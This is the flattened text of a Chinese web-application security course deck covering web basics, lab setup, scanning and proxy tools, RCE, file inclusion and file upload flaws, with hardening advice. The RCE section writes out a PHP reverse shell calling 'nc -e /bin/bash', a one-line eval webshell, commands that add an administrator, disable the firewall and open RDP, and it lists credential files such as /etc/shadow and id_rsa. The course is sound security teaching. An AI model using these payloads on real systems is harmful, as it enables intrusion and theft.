《Web应用安全与防护》全套教学课件

《Web应用安全与防护》项目1：Web应用安全基础项目2：Web安全实践环境部署项目3：常用Web应用安全工具项目4：RCE漏洞利用与防护项目5：文件包含漏洞利用与防护项目6：文件上传漏洞利用与防护项目7：文件下载漏洞利用与防护项目8：SQL注入漏洞利用与防护项目9：XSS漏洞利用与防护项目10：渗透测试综合实训全套可编辑PPT课件

本课件是可编辑的正常PPT课件项目1：Web应用安全基础

本课件是可编辑的正常PPT课件项目目标知识目标1.了解web安全起源2.理解web体系结构3.掌握Web应用安全分析能力目标1.能对浏览器安全设置2.能对服务器安全配置情感目标1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件目录03Web应用安全01Web安全起源02Web系统架构&owasptop10目录本课件是可编辑的正常PPT课件1.Web安全起源文件传输邮件服务打印机服务Windows系统RPC服务Linux系统ssh服务1.Web技术发展不成熟2.攻击系统服务可以获取高权限网络安全初期本课件是可编辑的正常PPT课件1.Web安全起源静态页面CGI调用其他程序Web编程脚本语言框架横飞前段发展异步请求前端框架本课件是可编辑的正常PPT课件1.Web安全起源数据关乎于企业的信誉和个人安全获取重要的敏感数据攻击用户的浏览器面向安全意识薄弱的用户Web安全的两个里程碑本课件是可编辑的正常PPT课件目录03Web应用安全01Web安全起源02Web系统架构&owasptop10目录本课件是可编辑的正常PPT课件2.1Web系统架构

B/S（即Broswer/Server）解决了C/S（Client/Server）所带来的不便，在C/S结构的情况下，不同的服务需要安装不同的客户端软件，比如QQ、迅雷、Foxmail这种情况下安装的软件会越来越多.B/S架构将所有的服务都可以通过浏览器来完成（因为基本所有浏览器都安装了浏览器）。但B/S也有一些不利，比如操作稳定性、流畅度等方面相对较弱。本课件是可编辑的正常PPT课件2.1Web系统架构浏览器三大浏览器：Firefox、IE,chrome服务器Apache，iis，nginx数据库Mysql，SqlServer，Oracle等RequestResponseSQLResulthttp协议Sql命令支撑服务软件应用软件：tomcat，jboss等本课件是可编辑的正常PPT课件2.2OWASPTOP10Owasp:开源web应用安全项目，是一个国际权威的安全社区。官方网址：10项最严重的web应用程序安全风险，这些数据包含了数以百计的组织和超过10万个应用程序和api中收集的漏洞，结合了可用性，可检测性和影响程度评估而成。本课件是可编辑的正常PPT课件目录03Web应用安全01Web安全起源02Web系统架构&owasptop10目录本课件是可编辑的正常PPT课件4.Web应用安全Web应用安全体现：（1）Web协议安全（Http）（2）WEB服务器端安全问题（支撑软件、应用程序）（3）Web客户端（浏览器）本课件是可编辑的正常PPT课件4.Web应用安全—http协议1.HTTP协议概述（1）http(超文本传输协议)，1990年提出来了，当前的版本是http1.1（2）http是一个请求和回应协议：客户端提出请求，服务器对请求给出回应。（3）http使用的是使用TCP协议进行连接，端口号是80（4）http请求方法（get，post，head，put，delete，option，trace）Get，明文传输，传输的数据显示在地址栏，最大传输为2kb，Post，密文传输，传输的数据没有限制。本课件是可编辑的正常PPT课件4.Web应用安全—http协议2.http协议安全问题（1）信息泄漏（传输数据明文）（2）弱验证（会话双方没有严格认证机制）http1.1提供摘要访问认证机制，采用MD5将用户名、密码、请求包头等进行封装，但仍然不提供对实体信息的保护，无法有效解决信息泄露、数据篡改、重放攻击等安全问题（3）缺乏状态跟踪（请求响应机制决定http是一个无状态协议）Cookie+Session解决方案带来的安全问题本课件是可编辑的正常PPT课件4.Web应用安全—http协议3.HTTP工作机制-请求响应模式3.1HTTP请求包含三个部分1.开始行：方法/URL协议/版本2.首部行：请求头部3.实体主体：请求正文（一般不用）3.2HTTP响应包含三个部分1.协议状态代码描述2.响应包头3.实体包请求正文…..本课件是可编辑的正常PPT课件4.Web应用安全—http协议4.http请求数据结构（1）user_agent（简称UA）（2）X-Forwarded-For（主要是为了让web服务器获取访问用户的真实IP地址，未必真实，可以伪造）（3）Referer（表示从哪儿链接到服务器的网页）（4）Content-Type（定义网络文件的类型和网页的编码，用来程序间传送内容相关的编码信息）（5）Accept（代表发送端希望接收的数据类型）（6）Accept-Charset（编码）（7）Accept-Encoding（浏览器支持的压缩编码）（8）host（表示请求的服务器网址）（9）keep-Alive表示持久链接本课件是可编辑的正常PPT课件4.Web应用安全—http协议5.http状态码分类当浏览器访问一个网页时，浏览器会向服务器发送请求，在浏览器接收并显示网页前，此页面所在的服务器会返回一个包含http状态码的信息头，用以响应浏览器的请求。HTTP状态码分类分类分类描述1**信息，服务器收到请求，需要请求者继续执行操作2**成功，操作被成功接收并处理3**重定向，需要进一步的操作以完成请求4**客户端错误，请求包含语法错误或无法完成请求5**服务器错误，服务器在处理请求的过程中发生了错误本课件是可编辑的正常PPT课件4.Web应用安全—服务器安全服务支撑软件安全问题软件自身安全漏洞例：IIS5.0超长URL拒绝服务漏洞软件配置缺陷默认账号、口令不安全的配置例：IIS配置允许远程写入应用软件安全问题本课件是可编辑的正常PPT课件4.Web应用安全—Apache安全配置ApacheHTTPServer（Apache），阿帕奇安全配置只安装所需要的组件隐藏Apahce版本不用root运行Apache禁用目录浏览设置每个连接的最大请求数建立专门错误页面勤打补丁本课件是可编辑的正常PPT课件4.Web应用安全—IIS安全设置配置身份验证配置地址和域名访问规则配置SSL安全配置URL授权规则主目录及目录安全性（目录权限）日志安全文档和错误消息本课件是可编辑的正常PPT课件4.Web应用安全—IE安全配置清除浏览器数据本课件是可编辑的正常PPT课件小结1.

web安全起源2.web体系结构3.Web应用安全分析本课件是可编辑的正常PPT课件作业1.安装IIS服务器，并做安全配置2.设置安全浏览器本课件是可编辑的正常PPT课件项目2：Web安全实践环境部署

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解web常见名词及术语的含义2.掌握kaillinux安装与msf框架的更新3.掌握web漏洞环境部署（linux、win）能力目标：1.能部署linux及window

web漏洞环境情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件目录03搭建winweb漏洞环境01web专业术语02搭建linuxweb漏洞环境目录本课件是可编辑的正常PPT课件1.专业术语常见专业名词CVEEXPpayloadPOCshellcodewebshellRCESQLXSSCSRF0day1dayndaywaf蜜罐提权CNNVDNVD本课件是可编辑的正常PPT课件1.专业术语1.CVE（CommonVulnerabilities&Exposures）全球漏洞编号2.exp（exploit）能够对漏洞攻击的代码。（漏洞利用）3.poc：证明漏洞存在的代码4.payload：攻击荷载，它是最终发送到服务器执行的代码5.Shellcode：用于利用软件漏洞执行代码，属于payload，是攻击代码最核心的就是shellcode6.webshell：web后门7.RCE：远程代码执行漏洞

本课件是可编辑的正常PPT课件1.专业术语8.0day：零日漏洞。即刚被发现后立即被恶意利用的安全漏洞，一般来说，那些已经被小部分人发现，但是还未公开、还不存在安全补丁的漏洞。9.1day：已经公开的新鲜漏洞（大部分机器未打补丁）10.Nday：公开很久的漏洞11.提权：提升到管理员权限12.NVD:国家漏洞数据库13.CNNVD:中国国家漏洞数据库本课件是可编辑的正常PPT课件1.专业术语14.WAF（WebApplicationFirewall）Web应用防火墙15.蜜罐：在主机上布置一些漏洞，诱惑攻击者进入，从而可以对攻击行为进行捕获和分析，了解攻击方所使用的工具与方法，推测攻击意图和动机，能够让防御方清晰地了解他们所面对的安全威胁。16.SQL:SQL注入漏洞17.XSS：跨站脚本攻击漏洞18.CSRF:跨站请求伪造漏洞本课件是可编辑的正常PPT课件目录03搭建winweb漏洞环境01web专业术语02搭建linuxweb漏洞环境目录本课件是可编辑的正常PPT课件2.Web漏洞环境搭建—Linux搭建web2.centos7Linux+Apache+MySQL+PHP（LAMP）Step1：配置yum源Step2：安装apacheStpe3：安装mysqlStep4：安装phpStep5：测试本课件是可编辑的正常PPT课件3.Web漏洞环境搭建—Linux搭建webMetasploitable2

虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击。metasploitable2下载地址/projects/metasploitable/files/Metasploitable2/本课件是可编辑的正常PPT课件目录03搭建winweb漏洞环境01web专业术语02搭建linuxweb漏洞环境目录本课件是可编辑的正常PPT课件3.Web漏洞环境搭建—win搭建web3win搭建web环境Step1：下载phpstudy

/Step2：安装phpstudyStep3：部署dvwa漏洞环境step4:修改dvwa配置文件Step5：测试

本课件是可编辑的正常PPT课件web攻击环境kailLinux系统安装/downloads/2.更新msf3.几个网站///本课件是可编辑的正常PPT课件小结1.web常见名词及术语的含义2.kaillinux安装、msf框架的更新3.web漏洞环境部署本课件是可编辑的正常PPT课件作业1.部署windowweb漏洞环境2.部署linuxweb漏洞环境3.更新msf本课件是可编辑的正常PPT课件项目3：常用Web应用安全工具

本课件是可编辑的正常PPT课件项目目标【知识目标】（1）了解一句话木马工作原理。（2）掌握Nmap端口扫描技术。（3）掌握BurpSuite的抓包、改包和暴力破解等核心功能。（4）掌握Wireshark的数据包捕获、过滤和深度分析方法。【技能目标】（1）能够运用Nmap进行有效的端口扫描，识别目标系统的开放端口和服务。（2）能够使用BurpSuite进行网络数据的抓取、修改、重放及进行基本的暴力破解攻击。（3）能够利用Wireshark进行网络流量分析，识别异常数据包和潜在的安全威胁。（4）能够使用Webshell管理工具进行服务器管理，包括文件操作、命令执行等。【素质目标】（1）培养网络安全意识。（2）培养创新思维能力。（3）激发自主学习热情。本课件是可编辑的正常PPT课件1.信息收集概述1.1信息收集定义收集目标的情报信息是一个非常重要的环节，可以大大提高渗透测试的成功性。收集渗透目标情报一般是对目标系统的分析，扫描探测，服务查点，查找对方系统IP等，社会工程学在渗透测试中也有经常使用。渗透测试会尽力收集目标系统的配置，whois，主机IP段，公司人员，安全防御以及防火墙等信息。1.信息收集2.漏洞挖掘3.漏洞利用4.权限提升5.内网渗透6.痕迹清除渗透测试流程本课件是可编辑的正常PPT课件1.信息收集概述著名的照片泄密案背景大庆油田在发现之初，其位置、储量、产量等信息全部定为国家机密1964年《中国画报》封面泄露信息衣着判断->北纬46度至48度的区域（即齐齐哈尔与哈尔滨之间）所握手柄的架式->油井的直径钻井与背后油田的距离和井架密度->储量和产量本课件是可编辑的正常PPT课件1.信息收集概述微博时代的范例：影星的住址背景：明星家庭住址是明星隐私，她们都不愿意透露，微博时代，明星也爱玩微博微博信息13:50:四环堵死了，我联排要迟到了？在北京工作这么久，都没在北京中心地带买一套房子光顾着看围脖，忘记给老爸指路，都开到中关村了结论：北四环外某个成熟小区，小区中间有三个相连的方形花坛Googleearth能帮助我们快速找到这个小区本课件是可编辑的正常PPT课件1.信息收集概述时间：2013年6月人物：爱德华.斯诺登将棱镜门项目的秘密文档披露给了英国《卫报》和美国《华盛顿邮报》大数据的价值：

（1）信息收集是情报分析的基础（2）依托数据分析获取重要信息本课件是可编辑的正常PPT课件1.信息收集概述1.2信息收集目的（1）黑客在攻击之前需要收集信息，才能实时有效的攻击。（2）安全管理员用信息收集技术来发现系统的弱点，并进行修补本课件是可编辑的正常PPT课件1.信息收集概述1.3信息收集分类（1）被动信息收集

：网站与服务信息：whois、DNS

搜索引擎：baidu，google

社会工程学……（2）主动信息收集本课件是可编辑的正常PPT课件1.信息收集概述1.3信息收集分类（2）主动信息收集

：主机扫描端口扫描

服务扫描

操作系统扫描……本课件是可编辑的正常PPT课件2.信息收集之DNS信息收集2.1DNS信息收集方式（1）命令行查询：nslookup，dig（2）在线查询：/dns//

（3）工具查询：dnsenum本课件是可编辑的正常PPT课件2.信息收集之DNS信息收集2.2DNS信息收集演示：nslookup-type=nsnslookup–type=ptr

或者输入nslookup命令进入shell交互settype=ns/ptr输入域名或者ip本课件是可编辑的正常PPT课件3.信息收集之社会工程学凯文·米特尼克世界著名黑客3次入狱记者采访：你最擅长的技术是什么？回答:社会工程学，技术会过时，只有社会工程学永远不会凯文米特尼克所著《欺骗的艺术》本课件是可编辑的正常PPT课件3.信息收集之社会工程学人是永远的系统弱点!什么是社会工程学攻击利用人性弱点（本能反应、贪婪、易于信任等）进行欺骗获取利益的攻击方法社会工程学的危险永远有效的攻击方法人是最不可控的因素本课件是可编辑的正常PPT课件3.信息收集之社会工程学3.1公开信息：通过社交网站进行公开信息收集，比如QQ，QQ空间，微信朋友圈，微博等，能获取到的信息有姓名、年龄、生日、星座、爱好、照片、人际交往关系，甚至邮箱、手机、住址、身份证等等隐私、敏感信息。还有一些招聘求职网站也往往是信息泄露最严重的地方。3.2社工库：是运用社会工程学进行攻击的时候积累的各方面的数据结构化数据库。这个数据库里有大量信息，甚至可以找到每个人的各种行为记录，比如酒店开房记录，个人身份证、姓名和电话号码。本课件是可编辑的正常PPT课件4.信息收集之端口扫描4.1端口扫描简介端口扫描工具：nmap，被称为扫描器之王。通过端口扫描确定主机开放的端口，不同的端口对应运行着不同的服务。基本功能如下：（1）探测一组主机是否在线（2）扫描主机端口，嗅探所提供的网络服务（3）推断主机所用的操作系统本课件是可编辑的正常PPT课件4.信息收集之端口扫描4.2Nmap扫描方式（1）全扫描（2）半扫描（3）隐蔽扫描（4）漏洞扫描……本课件是可编辑的正常PPT课件4.信息收集之端口扫描4.3nmap常用参数（1）-sT:tcp连接扫描

例：nmap–sT（2）-sS:tcpsyn扫描例：nmap-sS（3）-sU:udp扫描例：nmap-sU–p1-65535（4）-p：扫描指定端口（5）-F:快速扫描主机格式:192.168.1.*192.168.1-255.1-254/24本课件是可编辑的正常PPT课件4.信息收集之端口扫描4.3nmap常用参数（5）-O:显示操作系统例:nmap–O（6）-sV:显示Banner信息例:nmap–sV（7）-v：输出更详细的信息例:nmap–svV（8）-oX:导出扫描结果到xml文件中例:nmap–oXresult.xml本课件是可编辑的正常PPT课件4.信息收集之端口扫描4.3nmap

常用参数（9）-oG：导出扫描结果到txt文件中

nmap-sV–p22,80-oG1.txt（10）-Pn：不进行ping扫描（11）-iL:从一个文件中扫描主机列表

namp–-iLip.txt（12）-exclude：扫描地址段排除某段地址

namp/24–exclude00本课件是可编辑的正常PPT课件4.信息收集之端口扫描规避防火墙：用一组虚拟的地址掩盖自己真实的IP地址，从而规避被发现扫描过程，可以达到一个规避防火墙的功能。例如：nmap–v–F–Pn–D05，06，ME–eeth0–g3355-Pn：不进行ping扫描-D:使用虚拟IP地址掩盖真实IPME:真实IP-e

eth0从该网卡发送数据包-g3355表是自己使用某个端口

靶机地址本课件是可编辑的正常PPT课件5.BurpSuite工具

BurpSuite

是用于攻击web应用程序的集成平台。常用的功能：抓包、重放、爆破Burpsutie工具安装使用1.在win环境下，需要首先安装java环境2.下载地址：/burp/communitydownload

3.在kailinux环境下，输入burpsuite启动该工具本课件是可编辑的正常PPT课件5.BurpSuite工具

Proxy是一个拦截http/https的代理服务器，作为一个在浏览器和目标应用程序之间的中间人，允许你拦截、查看、修改在两个方向上的原始数据。本课件是可编辑的正常PPT课件5.BurpSuite工具

在使用brupsutie抓包之前，需要对burpsuite进行配置和浏览器进行配置Burpsuite配置浏览器配置本课件是可编辑的正常PPT课件5.BurpSuite工具

1.Burpsuite代理服务设置2.Burpspide探测web结构3.暴力攻击web口令本课件是可编辑的正常PPT课件6.Wireshark

1.Wireshark简介Wireshark是一款强大的网络分析工具，该工具主要用来用来捕获网络数据包，并自动解析数据包，为用户显示数据包的详细信息，供用户对数据包进行分析。它支持Windows、Linux、MacOSX等多种操作系统，KaliLinux操作系统已经自行安装好了该软件。打开已经安装好的Wireshark，本课件是可编辑的正常PPT课件6.Wireshark显示过滤器:捕获数据后，设置过滤条件，显示过滤器通过特定的表达式来筛选出满足条件的数据包，使得分析工作更加高效和便捷。菜单栏下方的输入框就是输入显示过滤条件的地方本课件是可编辑的正常PPT课件6.Wireshark（3）常用显示过滤器表达式①IP地址过滤ip.addr==#显示所有源或目标IP为

的数据包。ip.src==或ip.dst==#分别过滤源IP或目标IP。②端口过滤tcp.port==80#显示所有TCP端口为80的数据包（通常用于HTTP流量）。udp.port==53#显示所有UDP端口为53的数据包（通常用于DNS查询）。本课件是可编辑的正常PPT课件6.Wireshark③协议过滤http#显示所有http数据包。tcp#显示所有TCP数据包。icmp#显示所有ICMP数据包。ip||arp#显示IP和ARP数据包。tcp||udp||icmp#显示TCP、UDP和ICMP数据包。④多条件组合ip.addr==&&tcp.port==80#同时过滤IP地址和端口。本课件是可编辑的正常PPT课件6.Wireshark⑤使用逻辑运算符!(ip.addr==)#排除所有IP地址为的数据包。⑥数据内容过滤data[0:2]==00:00#检查数据包的前两个字节是否为00:00。frame[0:3]=="GET"#检查数据包的开始三个字节是否为"GET"（HTTPGET请求）。⑦HTTP请求方法过滤http.request.method=="GET"

#仅显示HTTPGET请求。http.request.method=="POST"#仅显示HTTPPOST请求。本课件是可编辑的正常PPT课件6.Wireshark⑧域名过滤http.host==""#仅显示访问特定域名的主机流量。⑨URL过滤http.request.uri=="/index.html"#仅显示请求特定URI的数据包。⑩数据包长度过滤frame.len==1500#显示数据包大小恰好为1500字节的数据包。frame.len>1000&&frame.len<1500#显示大小在1000到1500字节之间的数据包。本课件是可编辑的正常PPT课件6.Wireshark⑪特定数据包内容过滤datacontains"username"#显示包含"username"字符串的数据包。data[0:4]contains"login"#显示前四个字节中包含"login"字符串的数据包。⑫TCP状态过滤tcp.flags==0x18#仅显示TCP数据包，其中标志为PSH和ACK。tcp.flags&RST==1#仅显示TCPRST（重置）数据包。本课件是可编辑的正常PPT课件中国菜刀

Webshell管理工具是一种专门用于管理和控制已经成功植入目标服务器的Webshell的客户端工具，它提供了用户友好的界面来执行系统命令、文件管理、数据库操作等。常见的Webshell管理工具有中国菜刀（Chopper）、中国蚁剑（AntSword）、冰蝎（Behinder）等。本书以典型的Webshell管理工具中国菜刀为例讲解。本课件是可编辑的正常PPT课件项目4：RCE漏洞利用与防护

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解RCE漏洞的定义、分类2.掌握远程系统命令执行漏洞利用与加固3.掌握远程代码执行漏洞利用与加固能力目标：1.具有利用RCE漏洞获取系统权限的能力情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件1.RCE漏洞概要1.1RCE漏洞定义RCE(remotecommand/codeexecute)，RCE漏洞可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。本课件是可编辑的正常PPT课件1.RCE漏洞危害1.2RCE漏洞的危害RCE漏洞的危害跟web中间件运行的权限有关。由于web应用运行在web中间件上，所以web应用会“继承”web中间件的运行权限。如果存在RCE漏洞的web应用运行在以系统管理员身份运行的web中间件上，那么黑客就相当于拥有一个管理员权限的shell，如果中间件权限分配过大，黑客就可以控制web服务器。黑客可以利用漏洞任意的执行权限允许的命令，比如，查看系统敏感信息，添加管理员，反弹shell，下载并运行恶意代码等。本课件是可编辑的正常PPT课件1.RCE漏洞危害1.3敏感信息--Windows敏感信息

C:\boot.ini//查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml//IIS配置文件

C:\Windows\repair\sam//存储系统初次安装的密码

C:\ProgramFiles\mysql\my.ini//Mysql配置

C:\ProgramFiles\mysql\data\mysql\user.MYD//MysqlrootC:\Windows\php.ini//php配置信息

C:\Windows\my.ini//Mysql配置信息本课件是可编辑的正常PPT课件1.RCE漏洞危害1.3敏感信息--Linux敏感信息：/root/.ssh/id_rsa/root/.ssh/id_ras.keystore/root/.ssh/known_hosts//记录每个访问计算机用户的公钥/etc/passwd、/etc/shadow/etc/f//mysql配置文件/etc/httpd/conf/httpd.conf//apache配置文件/root/.bash_history//用户历史命令记录文件/root/.mysql_history//mysql历史命令记录文件本课件是可编辑的正常PPT课件1.RCE漏洞概要1.4RCE漏洞分类：

（1）远程系统命令执行漏洞（2）远程代码执行漏洞本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.1远程系统命令执行漏洞

一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口，比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。但是设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交“意想不到”的命令，从而让后台进行执行，从而控制整个后台服务器。本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.2命令执行漏洞原理命令执行漏洞的本质是由于系统把用户输入进来的参数当成了要执行的命令，并且这些命令被执行了，这样就造成了命令注执行漏洞。命令执行漏洞产生的原因有两点（1）web网站没有对用户提交的参数进行有效的检测过滤（2）操作系统允许一条语句执行多条命令（使用连接符和管道符）本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.3常见连接符序号常见命令连接符说明1A;B先执行A,再执行B2A&B简单拼接，AB之间无制约关系3A|B显示B的执行结果4A&&BA执行成功，然后才会执行B5A||BA执行失败，然后才会执行B其他连接符>>>.将结果重定向文件中（源文件内容会删除）>>结果追加到文件末尾，源文件内容不会被删除。|管道，将命令的结果输出给另一个命令作为输入用本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞netuser||whoaminetuser&&whoaminetuser：查看当前系统有哪些用户whoami：查看当前系统登录的用户本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.4常见的系统命令--window序号命令功能1ping测试网络连通性2netstat查看网络开放端口及连接状态3netuser查看，增加，删除当前系统账号4netlocalgroup查看，增加，删除当前系统用户组5dir查看当前目录下的文件和子目录信息6systeminfo查看当前计算机的综合信息7tasklist查看当前运行的进程信息本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.4常见的系统命令--linux序号命令功能1ifconfig查看ip地址2netstat查看网络开放端口及连接状态3whoami查看当前用户4cat/etc/passwd查看所有用户的信息5useradd添加用户6userdel删除用户7passwd修改密码本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.5源代码分析本课件是可编辑的正常PPT课件2.远程系统命令执行漏洞2.6远程系统命令执行漏洞利用Window中，添加管理员账号：netusertest123456/add#添加用户testnetlocalgroupadministratorstest/add#把用户test加入管理员组关闭防火墙：netshadvfirewallsetpublicprofilestateoff开3389端口（win7）REGADDHKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server/vfDenyTSConnections/tREG_DWORD/d0/f本课件是可编辑的正常PPT课件3.远程代码执行漏洞3.1远程代码执行漏洞同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。3.2与命令执行漏洞区别：命令执行漏洞是直接调用操作系统命令代码执行漏洞则是依靠执行脚本代码调用操作系统命令本课件是可编辑的正常PPT课件3.远程代码执行漏洞3.3PHP执行系统命令的函数(1)system()用法：system(string$command，[,int&$return_var])(2)exec()用法：exec(string$command[,array&$output[,int&$return_var]])(3)shell_exec()

用法：shell_exec(string&command)本课件是可编辑的正常PPT课件3.远程代码执行漏洞3.3PHP执行系统命令的函数(4)passthru()用法：passthru(string$command[,int&$return_var])(5)eval用法：eval(string$code)注：eval函数和前面四个函数的区别是不仅可以执行系统命令，还可以将code参数直接当作php代码执行。本课件是可编辑的正常PPT课件3.远程代码执行漏洞3.4远程代码执行漏洞利用1<?phpsystem('uname-a');?>2<?phpsystem(‘nc–e/bin/bash007777’)?>

攻击机：nc–lvp77773一句话木马：<?php@eval($_POST['caidao']);?>本课件是可编辑的正常PPT课件3.远程代码执行漏洞3.4远程代码执行漏洞利用（1）反弹shell（2）一句话木马本课件是可编辑的正常PPT课件4RCE漏洞加固1.尽量少用执行命令的函数或直接禁用2.参数值尽量使用引号包括3.在进入执行命令函数之前，变量一定要做好过滤，对敏感字符转义4.在使用动态函数之前，确保使用的函数是指定的函数之一本课件是可编辑的正常PPT课件小结1.RCE漏洞定义，分类2.命令执行漏洞的原因、利用3.代码执行漏洞，php系统函数4.

RCE漏洞加固方法本课件是可编辑的正常PPT课件作业1.利用dvwa环境，进行命令执行漏洞利用（1）创建一个用户，并加入到管理员组（win、linux）（2）win开启3389，远程连接（3）linux通过ssh进行连接2.利用system函数写一个反弹shell3.利用eval函数写一个一句话木马本课件是可编辑的正常PPT课件THEEND谢谢！本课件是可编辑的正常PPT课件项目5：文件包含漏洞利用与防护

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解文件包含、文件包含漏洞定义2.理解文件包含漏洞的分类、文件包含函数3.掌握文件包含漏洞利用，防范措施能力目标：1.能运用文件包含漏洞获取敏感信息以及加固方法情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件目录01文件包含漏洞概述02文件包含漏洞利用与防御目录本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.1文件包含在web后台开发中，程序员往往为了提高效率以及让代码看起来更加简洁，会使用包含函数功能，比如会把网页引用的标准页眉（head.php）或菜单文件写进一个文件中,之后某个文件需要调用的时候就直接在文件头中写上一句<？phpincludehead.php?>.使用文件包含为开发者节省大量的时间。--当页眉需要更新时，您只更新一个包含文件就可以了，或者向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.2文件包含漏洞有些时候，由于网站功能的需求，文件包含的代码文件被写成了一个变量，且这个变量可以由前端用户传进来，由于传入的文件名没有合理的校验，或者校验被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入，读取系统给敏感文件。本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.3文件包含代码<?php$file=$_GET[‘file’];#将参数file的值传递给变量$fileinclude$file;#使用include函数包含文件?>原因分析：文件包含函数加载的参数没有经过过滤或者严格的定义，可以被用户控制，包含其他恶意文件，导致了执行了非预期的代码。本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.4PHP文件包含函数大部分文件包含的漏洞都出现在php的程序中，因PHP语言提供的文件包含功能太强大，太灵活。（1）include():包含过程中如果出现错误，会抛出一个警告，程序继续正常执行。（2）include_once()：同include，只包含一次。（3）require()：包含过程中如果出现错误，会退出程序的执行。（4）require_once()：同require，只包含一次。使用与在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包含一次以避免函数重定义、变量重定义赋值等问题。本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.5文件包含漏洞分类根据不同的配置环境，文件包含漏洞分为如下两种情况：（1）本地文件包含：当被包含的文件在服务器本地（2）远程文件包含：当被包含的文件在远程服务器远程文件包含条件：在php.ini文件中allow_url_fopen=on#默认打开allow_url_include=on#默认关闭本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.5.1本地文件包含用户Webserver：../../php/php.ini(敏感文件/系统配置文件)本课件是可编辑的正常PPT课件1.文件包含漏洞概述1.5.2远程文件包含用户Webserver：远程包含本课件是可编辑的正常PPT课件目录01文件包含漏洞概述02文件包含漏洞利用与防御目录本课件是可编辑的正常PPT课件2.文件包含漏洞利用与防御2.1文件包含漏洞利用1.本地文件包含2.远程文件包含3.文件上传+文件包含综合利用本课件是可编辑的正常PPT课件2文件包含漏洞利用与防御2.2文件包含漏洞防御（1）在功能设计上尽量不要将文件包含函数对应的文件放给前端进行选择和操作（2）过滤各种../../,http://,https://（3）配置php.ini配置文件allow_url_fopen=offallow_url_include=offmagic_quotes_gpc=on（4）通过白名单策略，仅允许包含运行指定的文件，其他的都禁止本课件是可编辑的正常PPT课件小结1.文件包含漏洞的定义、分类2.文件包含漏洞的利用3.文件包含漏洞加固本课件是可编辑的正常PPT课件作业1.利用本地文件包含漏洞读取目标系统敏感文件2.利用文件上传+文件包含漏洞写入webshell本课件是可编辑的正常PPT课件THEEND谢谢！本课件是可编辑的正常PPT课件项目6：文件上传漏洞利用与防护

本课件是可编辑的正常PPT课件项目目标知识目标：1.了解文件上传漏洞的概念、原因、危害2.理解文件上传漏洞的测试流程3.掌握文件上传漏洞的利用与防御措施能力目标：1.能够利用文件上传漏洞，控制web服务器情感目标：1.自主、开放的学习能力2.良好的自我表现、与人沟通能力3.良好的团队合作精神本课件是可编辑的正常PPT课件目录01文件上传漏洞概述02文件上传漏洞利用与防御目录本课件是可编辑的正常PPT课件1.1文件上传文件上传功能在web应用系统很常见，因为业务功能需要，很多web站点都有文件上传的接口，比如（1）注册时上传头像图片（jpg，png，gif等）（2）上传文件附件（doc，xls等）当用户点击上传按钮后，后台会对上传的文件进行判断比如是否是指定的类型、后缀名、大小等等，然后将其按照设计的格式进行重命名后存储在指定的目录。1.文件上传漏洞概述本课件是可编辑的正常PPT课件1.2文件上传漏洞在进行文件上传功能的时候，而在后台对上传的文件没有进行安全考虑或者采用了有缺陷的措施，导致攻击者可以通过一些手段绕过安全措施从而上传一些恶意的文件，比如一句话木马，从而通过对该恶意文件的访问来控制整个web后台。文件上传漏洞可以说是日常渗透测试中用得最多的一个漏洞，用它获得服务器权限最快最直接（高危漏洞）。1.文件上传漏洞概述本课件是可编辑的正常PPT课件1.文件上传漏洞概述1.3文件上传漏洞危害（1）上传文件是病毒或木马时，可以诱骗用户下载执行或者自动执行。（2）上传文件是webshell时，攻击者可通过这些网页后门执行命令（3）上传文件是恶意图片时，图片中可能包含了脚本，加载或者点击这些图片时脚本会执行……本课件是可编辑的正常PPT课件1.文件上传漏洞概述1.4文件上传漏洞原因（1）文件上传检查不严：没有检查或者客户端检查（2）文件上传后修改文件名处理不当：允许已经上传的文件进行重命名（3）使用第三方插件引入：例如著名的博客平台wordpress就有丰富的插件，而这些插件中每年都会被挖掘出大量的文件上传漏洞。本课件是可编辑的正常PPT课件1.文件上传漏洞概述1.5文件上传漏洞测试流程（1）对文件上传的地方按照要求上传文件，查看返回结果（路径，提示等）；（2）尝试上传不同类型的“恶意文件”，比如php文件，分析结果；（3）查看html源码，看是否通过js在前端做了上传限制，可以绕过；（4）尝试使用不同方式进行绕过，黑白名单绕过/MIME绕过/0x00阶段绕过等；（5）测试或者结合其它漏洞（比如文件包含等）得到木马，连接测试。本课件是可编辑的正常PPT课件目录01文件上传漏洞概述02文件上传漏洞利用与防御目录本课件是可编辑的正常PPT课件2.文件上传漏洞利用与防御2.1文件上传漏洞